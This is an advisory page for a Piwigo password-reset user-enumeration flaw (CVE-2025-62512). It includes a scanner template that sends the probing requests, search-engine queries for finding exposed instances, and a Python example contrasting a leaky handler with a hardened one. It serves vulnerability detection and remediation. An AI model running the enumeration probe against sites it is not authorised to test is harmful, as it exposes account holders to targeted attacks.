
Piwigo - User Enumeration via Password Reset

CVE-2025-62512
Verified

Description

Piwigo is an open source photo gallery application for the web. In version 15.5.0 and likely earlier 15.x releases, the password reset functionality in Piwigo allows an unauthenticated attacker to determine whether a given username or email address exists in the system. The endpoint at password.php?action=lost returns distinct messages for valid vs. invalid accounts, enabling user enumeration. As of the time of publication, no known patches are available.

Severity

Medium

CVSS Score

5.3

Exploit Probability

2%

Affected Product

piwigo

Published Date

March 24, 2026

Template Author

dhiyaneshdk

CVE-2025-62512.yaml
id: CVE-2025-62512

info:
  name: Piwigo - User Enumeration via Password Reset
  author: DhiyaneshDk
  severity: medium
  description: |
    Piwigo is an open source photo gallery application for the web. In version 15.5.0 and likely earlier 15.x releases, the password reset functionality in Piwigo allows an unauthenticated attacker to determine whether a given username or email address exists in the system. The endpoint at password.php?action=lost returns distinct messages for valid vs. invalid accounts, enabling user enumeration. As of time of publication, no known patches are available.
  impact: |
    Unauthenticated attackers can enumerate valid usernames or email addresses, aiding further targeted attacks.
  remediation: |
    Update to the latest version when available or apply mitigations to unify response messages.
  reference:
    - https://github.com/Piwigo/Piwigo/security/advisories/GHSA-h4wx-7m83-xfxc
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-62512
    epss-score: 0.02263
    epss-percentile: 0.84703
    cwe-id: CWE-204
  metadata:
    verified: true
    max-request: 2
    vendor: piwigo
    product: piwigo
    shodan-query: http.html:"Piwigo"
    fofa-query: body="Piwigo"
  tags: cve,cve2025,piwigo,user-enum,exposure

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /password.php HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: token
        part: body
        group: 1
        regex:
          - 'name="pwg_token"\s+value="([a-f0-9]+)"'
        internal: true

  - raw:
      - |
        POST /password.php?action=lost HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        pwg_token={{token}}&username_or_email=nonexistent-{{rand_int(10000,99999)}}@example.com&submit=Change+my+password

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Invalid username or email"

      - type: status
        status:
          - 200
# digest: 490a004630440220346f842bb2ab50dc16edb2abe3bf351908668576707d042e5078ee039d0538e4022014e0ba64ec0a0d1ed5455a30fdf37888c759616fe50b0d998988536a5d59d11f:922c64590222798bb761d5b6d8e72950
CVSS Metrics

Score: 5.3
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVE ID: CVE-2025-62512
CWE ID: CWE-204

References

https://github.com/Piwigo/Piwigo/security/advisories/GHSA-h4wx-7m83-xfxc

Remediation Steps

Update to the latest version when available or apply mitigations to unify response messages.
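The remediation comes down to removing the observable response discrepancy (CWE-204): the reset endpoint must answer identically whether or not the account exists. The following added example is not Piwigo's code; it contrasts a handler that leaks account existence through its message with one that returns a single uniform message and only acts on a matching account internally. The account store and mail outbox are constructed stand-ins.

```python
import secrets

# Constructed sample account store (not Piwigo data): username -> email
USERS = {"admin": "admin@example.com", "alice": "alice@example.com"}

# One message for every caller; it must not depend on whether the
# submitted username or email matches an account.
UNIFORM_MESSAGE = ("If an account matches, a password-reset link has been "
                   "sent to its email address.")


def find_account(username_or_email: str):
    """Look up by username or email; returns (username, email) or None."""
    for name, email in USERS.items():
        if username_or_email in (name, email):
            return name, email
    return None


def lost_password_vulnerable(username_or_email: str) -> dict:
    """Pattern the advisory describes: the body reveals whether the account exists."""
    if find_account(username_or_email) is None:
        return {"status": 200, "body": "Invalid username or email"}
    return {"status": 200, "body": "Check your email for the reset link"}


def lost_password_hardened(username_or_email: str, outbox: list) -> dict:
    """Same status and body for valid and invalid input; the side effect
    (queueing the reset mail) happens only for a real account and is not
    reflected in the response. Timing differences are not addressed here."""
    account = find_account(username_or_email)
    if account is not None:
        token = secrets.token_hex(32)  # reset token, delivered out of band
        outbox.append({"to": account[1], "token": token})  # stand-in for sending mail
    return {"status": 200, "body": UNIFORM_MESSAGE}


def responses_identical(a: dict, b: dict) -> bool:
    """Check a defender would run: valid and invalid inputs must be indistinguishable."""
    return a["status"] == b["status"] and a["body"] == b["body"]
```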